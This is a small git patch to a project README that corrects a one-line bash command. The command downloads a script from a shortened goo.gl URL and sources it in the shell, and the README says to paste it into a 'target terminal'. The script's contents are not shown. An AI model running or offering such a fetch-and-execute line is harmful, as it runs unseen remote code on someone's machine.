From 20b178ae42c4b9f6b1d603678ce521d2549cec2a Mon Sep 17 00:00:00 2001 From: Starbeamrainbowlabs Date: Thu, 6 Jul 2017 15:27:48 +0100 Subject: [PATCH] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 761a7df..a0715f8 100644 --- a/README.md +++ b/README.md @@ -72,7 +72,7 @@ Here's a list of things it currently supports: To use it, simply paste this into the target terminal: ```bash -cstemp=$(mktemp); curl -o ${cstemp}; -L https://goo.gl/ZTtVRq; chmod +x ${cstemp}; source ${cstemp}; rm ${cstemp}; cstemp=; +cstemp=$(mktemp); curl -o ${cstemp} -L https://goo.gl/ZTtVRq; chmod +x ${cstemp}; source ${cstemp}; rm ${cstemp}; cstemp=; ``` ## Disclaimer